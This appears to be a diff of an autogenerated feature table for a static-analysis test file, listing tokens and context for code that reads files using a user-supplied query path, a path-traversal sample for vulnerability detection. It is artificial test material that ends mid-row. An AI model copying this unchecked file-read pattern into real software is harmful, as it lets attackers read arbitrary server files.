allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:236:14:236:47 | exceptional return of pathMod ... y.path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:236:14:236:47 | exceptional return of pathMod ... y.path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:236:14:236:47 | exceptional return of pathMod ... y.path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:236:14:236:47 | exceptional return of pathMod ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:236:14:236:47 | pathMod ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | | autogenerated/TaintedPath/normalizedPaths.js:236:14:236:47 | pathMod ... y.path) | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/normalizedPaths.js:236:14:236:47 | pathMod ... y.path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | | autogenerated/TaintedPath/normalizedPaths.js:236:14:236:47 | pathMod ... y.path) | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:236:14:236:47 | pathMod ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:236:25:236:31 | resolve | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:236:25:236:31 | resolve | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:236:25:236:31 | resolve | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:236:25:236:31 | resolve | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:236:25:236:31 | resolve | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:236:33:236:35 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:236:33:236:35 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:236:33:236:35 | req | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:236:33:236:35 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:236:33:236:35 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:236:33:236:41 | req.query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:236:33:236:41 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:236:33:236:41 | req.query | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:236:33:236:41 | req.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:236:33:236:41 | req.query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:236:33:236:46 | req.query.path | CalleeFlexibleAccessPath | pathModule.resolve | | autogenerated/TaintedPath/normalizedPaths.js:236:33:236:46 | req.query.path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:236:33:236:46 | req.query.path | calleeImports | path | @@ -8843,6 +75709,41 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:236:33:236:46 | req.query.path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:236:33:236:46 | req.query.path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:236:33:236:46 | req.query.path | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:236:37:236:41 | query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:236:37:236:41 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:236:37:236:41 | query | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:236:37:236:41 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:236:37:236:41 | query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:236:43:236:46 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:236:43:236:46 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:236:43:236:46 | path | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:236:43:236:46 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:236:43:236:46 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:238:3:238:4 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:238:3:238:4 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:238:3:238:4 | fs | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:238:3:238:4 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:238:3:238:4 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:238:3:238:17 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:238:3:238:17 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:238:3:238:17 | fs.readFileSync | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:238:3:238:17 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:238:3:238:17 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:238:3:238:23 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:238:3:238:23 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:238:3:238:23 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:238:3:238:23 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:238:3:238:23 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:238:3:238:23 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:238:3:238:23 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:238:3:238:23 | fs.read ... c(path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:238:3:238:23 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:238:3:238:23 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:238:6:238:17 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:238:6:238:17 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:238:6:238:17 | readFileSync | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:238:6:238:17 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:238:6:238:17 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:238:19:238:22 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:238:19:238:22 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:238:19:238:22 | path | calleeImports | fs | @@ -8852,6 +75753,66 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:238:19:238:22 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:238:19:238:22 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:238:19:238:22 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:240:7:240:10 | self | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:240:7:240:10 | self | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:240:7:240:10 | self | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:240:7:240:10 | self | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:240:7:240:10 | self | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:240:7:240:24 | self | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:240:7:240:24 | self | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:240:7:240:24 | self | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:240:7:240:24 | self | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:240:7:240:24 | self | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:240:7:240:24 | self = something() | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:240:7:240:24 | self = something() | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:240:7:240:24 | self = something() | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:240:7:240:24 | self = something() | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:240:7:240:24 | self = something() | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:240:14:240:22 | something | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:240:14:240:22 | something | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:240:14:240:22 | something | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:240:14:240:22 | something | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:240:14:240:22 | something | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:240:14:240:24 | exceptional return of something() | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:240:14:240:24 | exceptional return of something() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:240:14:240:24 | exceptional return of something() | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:240:14:240:24 | exceptional return of something() | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:240:14:240:24 | exceptional return of something() | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:240:14:240:24 | something() | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:240:14:240:24 | something() | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:240:14:240:24 | something() | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:240:14:240:24 | something() | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:240:14:240:24 | something() | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:242:7:242:10 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:242:7:242:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:242:7:242:10 | path | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:242:7:242:10 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:242:7:242:10 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:242:7:242:20 | path.substring | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:242:7:242:20 | path.substring | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:242:7:242:20 | path.substring | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:242:7:242:20 | path.substring | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:242:7:242:20 | path.substring | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:242:7:242:40 | exceptional return of path.su ... length) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:242:7:242:40 | exceptional return of path.su ... length) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:242:7:242:40 | exceptional return of path.su ... length) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:242:7:242:40 | exceptional return of path.su ... length) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:242:7:242:40 | exceptional return of path.su ... length) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:242:7:242:40 | path.su ... length) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:242:7:242:40 | path.su ... length) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:242:7:242:40 | path.su ... length) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:242:7:242:40 | path.su ... length) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:242:7:242:40 | path.su ... length) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:242:7:242:53 | path.su ... elf.dir | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:242:7:242:53 | path.su ... elf.dir | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:242:7:242:53 | path.su ... elf.dir | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:242:7:242:53 | path.su ... elf.dir | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:242:7:242:53 | path.su ... elf.dir | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:242:12:242:20 | substring | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:242:12:242:20 | substring | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:242:12:242:20 | substring | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:242:12:242:20 | substring | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:242:12:242:20 | substring | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:242:22:242:22 | 0 | CalleeFlexibleAccessPath | path.substring | | autogenerated/TaintedPath/normalizedPaths.js:242:22:242:22 | 0 | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:242:22:242:22 | 0 | calleeImports | path | @@ -8861,6 +75822,16 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:242:22:242:22 | 0 | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:242:22:242:22 | 0 | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:242:22:242:22 | 0 | receiverName | path | +| autogenerated/TaintedPath/normalizedPaths.js:242:25:242:28 | self | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:242:25:242:28 | self | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:242:25:242:28 | self | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:242:25:242:28 | self | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:242:25:242:28 | self | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:242:25:242:32 | self.dir | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:242:25:242:32 | self.dir | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:242:25:242:32 | self.dir | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:242:25:242:32 | self.dir | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:242:25:242:32 | self.dir | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:242:25:242:39 | self.dir.length | CalleeFlexibleAccessPath | path.substring | | autogenerated/TaintedPath/normalizedPaths.js:242:25:242:39 | self.dir.length | InputArgumentIndex | 1 | | autogenerated/TaintedPath/normalizedPaths.js:242:25:242:39 | self.dir.length | calleeImports | path | @@ -8870,6 +75841,56 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:242:25:242:39 | self.dir.length | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:242:25:242:39 | self.dir.length | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:242:25:242:39 | self.dir.length | receiverName | path | +| autogenerated/TaintedPath/normalizedPaths.js:242:30:242:32 | dir | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:242:30:242:32 | dir | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:242:30:242:32 | dir | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:242:30:242:32 | dir | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:242:30:242:32 | dir | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:242:34:242:39 | length | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:242:34:242:39 | length | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:242:34:242:39 | length | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:242:34:242:39 | length | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:242:34:242:39 | length | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:242:46:242:49 | self | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:242:46:242:49 | self | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:242:46:242:49 | self | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:242:46:242:49 | self | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:242:46:242:49 | self | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:242:46:242:53 | self.dir | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:242:46:242:53 | self.dir | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:242:46:242:53 | self.dir | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:242:46:242:53 | self.dir | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:242:46:242:53 | self.dir | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:242:51:242:53 | dir | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:242:51:242:53 | dir | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:242:51:242:53 | dir | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:242:51:242:53 | dir | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:242:51:242:53 | dir | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:243:5:243:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:243:5:243:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:243:5:243:6 | fs | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:243:5:243:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:243:5:243:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:243:5:243:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:243:5:243:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:243:5:243:19 | fs.readFileSync | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:243:5:243:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:243:5:243:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:243:5:243:25 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:243:5:243:25 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:243:5:243:25 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:243:5:243:25 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:243:5:243:25 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:243:5:243:25 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:243:5:243:25 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:243:5:243:25 | fs.read ... c(path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something path substring 0 self dir length self dir fs readFileSync path fs readFileSync path path slice 0 self dir length self dir fs readFileSync path fs 